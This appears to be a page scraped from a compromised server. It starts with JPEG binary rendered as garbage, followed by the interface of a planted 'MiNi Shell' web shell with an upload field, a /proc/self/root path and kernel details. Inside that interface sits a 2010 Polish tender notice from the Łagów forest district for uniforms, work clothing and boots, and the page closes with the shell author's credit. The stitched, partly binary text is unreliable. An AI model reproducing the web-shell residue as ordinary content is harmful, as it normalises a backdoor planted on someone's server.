JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100120/16898-N-2010.html

<p class="kh_header"><b>Łagów: Dostawa sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego w roku 2010</b><br>
<b>Numer ogłoszenia: 16898 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe - Nadleśnictwo Łagów , Wola Łagowska 118, 26-025 Łagów, woj. świętokrzyskie, tel. 041 30 740 23, faks 041 30 74 760.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radom.lasy.gov.pl/web/lagow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostaka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego w roku 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego, tj. mundur wyjściowy leśnika, mundur codzienny leśnika, mundur terenowy leśnika, oznaki, odzież i obuwie robocze w roku 2010.
I.Mundur wyjściowy leśnika:
1.Mundur wyjściowy męski
 - marynarka-szt	3
 - spodnie-szt	9
2.Mundur wyjściowy damski:
 - spodnie-szt 1
3.Koszula biała męska z długim rękawem	-szt	10
4.Koszula biała męska z krótkim rękawem	-szt	5
5.Bluzka biała damska z długim rękawem	-szt	3
6.Bluzka biała damska z krótkim rękawem	-szt	2
7.Krawat	-szt	9
8.Płaszcz wiosenno-jesienny damski -	szt	2
9.Płaszcz wiosenno-jesienny męski	-	szt	2
10.	Kapelusz męski	-szt	1
11.	Kurtka zimowa damska 	-szt	1
12.	Kurtka zimowa męska 	-szt	4
13.	Czapka mundurowa	-szt	3
14.	Szalik	-szt	5
15.	Skarpety	-par	110
16.	Półbuty wyjściowe-par	24
II.Mundur codzienny leśnika			
1.Koszula męska z długim rękawem	-szt	22
2.Koszula męska z krótkim rękawem-szt 11
3.Spodnie męskie- szt	29
4.Spódnica-	szt	1
5. Sweter	-szt	24
6. Kamizelka	 - szt	13
7. Bluza z polaru-szt	19
8. Kurtka	 -szt	15
9. Czapka zimowa-	szt	2
10.Peleryna -szt 1
11.Półbuty codzienne -par.	25
III.Mundur terenowy leśnika			
1.Ubranie letnie /bluza, spodnie, kamizelka/	4 Kpl
Spodnie 4 szt
Kamizelka 2 szt
2.Ubranie zimowe /kurtka, spodnie/	1 Kpl
Kurtka- 1 szt
Spodnie- 1 szt
3.Czapka letnia	-	szt	5
4.Czapka zimowa	-	szt	3
5.Trzewiki terenowe	-	par.	18
6.Rękawice damskie	-	par.	1
7.Rękawice męskie	-	par.	7
8.Buty Goretex	-	par.	25
IV.Oznaki			
1.Stylizowany wizerunek orła-	szt	2
2.Oznaki służbowe	-	szt	2
V.Odzież i obuwie robocze			
1.Buty gumowo filcowe	-par.	29
2.Buty gumowe	-par.	31
3.Płaszcz przeciwdeszczowy (kurtka wodochronna)	-szt	16
4.Ubranie letnie	-kpl	1
5.Ubranie ciepłochronne	-kpl	2
6.Trzewiki przemysłowe	-par.	1
7.Czapka letnia typu golfówka	-szt 1	
8.Torba bhp	-szt	29.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.23.00.00-0, 18.23.40.00-8, 18.23.20.00-4, 18.33.20.00-5, 18.30.00.00-2, 18.42.30.00-0, 18.21.20.00-8, 18.44.10.00-2, 18.22.30.00-8, 18.44.33.20-5, 18.42.20.00-3, 18.31.70.00-4, 18.81.32.00-3, 18.23.50.00-5, 18.23.53.00-8, 18.23.54.00-9, 18.22.32.00-0, 18.44.30.00-6, 18.21.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
1.O udzielenie zamówienia mogą się ubiegać Wykonawcy niepodlegający wykluczeniu na podstawie okoliczności , o których mowa w art. 24 ust. 1 ustawy Pzp .
2.O udzielenie zamówienia mogą się ubiegać Wykonawcy , którzy spełniają nw. warunki , o których mowa w art. 22 ust. 1 ustawy Pzp :

2.1.  Posiadanie wiedzy i doświadczenia      	
opis sposobu dokonania oceny spełnienia warunku :
Wykonawca musi posiadać wiedzę i doświadczenie polegające na wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zadania polegającego na dostawie sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego, z podaniem ich wartości (minimum 60000,00 zł brutto), dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie;
3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( np. spółki cywile , konsorcja ) , żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1  ustawy Pzp , natomiast warunki określone w pkt 7.2 SIWZ mogą spełniać łącznie.
4.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów o których mowa w pkt 8 SIWZ , na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia na podstawie okoliczności , o których mowa w art. 24 ust.1 ustawy Pzp, Wykonawcy powinni przedłożyć niżej wymienione dokumenty : 
1.1.   Oświadczenie o braku podstaw wykluczenia z postępowania  zgodnie z treścią załącznika nr 7 lub 8 do SIWZ;
1.2.  Aktualny odpis z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru , w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy Pzp , wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , a w przypadku osób fizycznych oświadcznie   w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp zgodnie z treścią załącznika nr 8 do SIWZ;
2.	W celu wykazania spełnienia warunków udziału w postępowaniu  , o których mowa w art. 22 ust. 1 ustawy Pzp  i  których opis sposobu oceny spełniania dokonany został w pkt 7.2  niniejszej SIWZ Wykonawcy powinni przedłożyć następujące dokumenty:
2.1.	Oświadczenie o spełnieniu warunków udziału w postępowaniu w zakresie art. 22 ust.1 ustawy Pzp - zgodnie z treścią załącznika nr 6 do SIWZ.
2.2.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku posiadania wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości (minimum 60000,00 zł brutto), przedmiotu (dostawa sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego), dat wykonania i odbiorców zgodnie z załącznikiem nr 5 do SIWZ, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie;                                                                                                                                
3. Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątka osoby poświadczającej kopię dokumentu za zgodność z oryginałem). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 
4.  W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a)	oświadczenie wymienione w pkt 2.1 powinno być złożone w imieniu wszystkich Wykonawców;
b)	dokumenty wymienione w pkt 1.1. - 1.2 powinny być złożone przez każdego Wykonawcę; 
c)	dokument wymieniony w pkt 2.2 mogą dotyczyć dowolnego spośród wykonawców składających wspólną ofertę .

5. Na ofertę składają się następujące dokumenty i załączniki:
1)  formularz oferty  - zał. nr 2 do SIWZ;
2)  kosztorys ofertowy - zał. nr 4 do SIWZ. Należy wyliczyć sumę : wartości netto (kolumna 5), kwoty podatku VAT (kolumna 6), cena brutto (kolumna 7). Przy każdej pozycji należy podać producenta danego przedmiotu umundurowania i odzieży roboczej;
3) zaświadczenie spełniania wymogów jakościowych w zakresie świadczenia usług
będących przedmiotem zamówienia, potwierdzone posiadaniem (Świadectwa
zgodności ze wzorem sortów mundurowych) wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu lub ważnego (6 miesiący od daty wystawienia) upoważnienia producenta wystawionego dla dystrybutora  do posługiwania się w/w Świadectwem (dotyczy sortów mundurowych);
4) Do oferty Wykonawca dołączy po jednej sztuce wzoru oferowanego wyrobu oznaczonej nazwą Wykonawcy. Zamawiający zastrzega sobie prawo sprawdzenia jakości dostarczonych wyrobów przez ich naruszenie fizyczne. Wyroby te zostaną zwrócone Wykonawcom po zawarciu umowy. Wzory wyrobów należy dostarczyć do Zamawiajacego w dniu otwarcia ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.radom.lasy.gov.pl/web/lagow.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Łagów
Wola Łagowska 118
26-025 Łagów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:00, miejsce: Nadleśnictwo Łagów
Wola Łagowska 118
26-025 Łagów
pokój nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com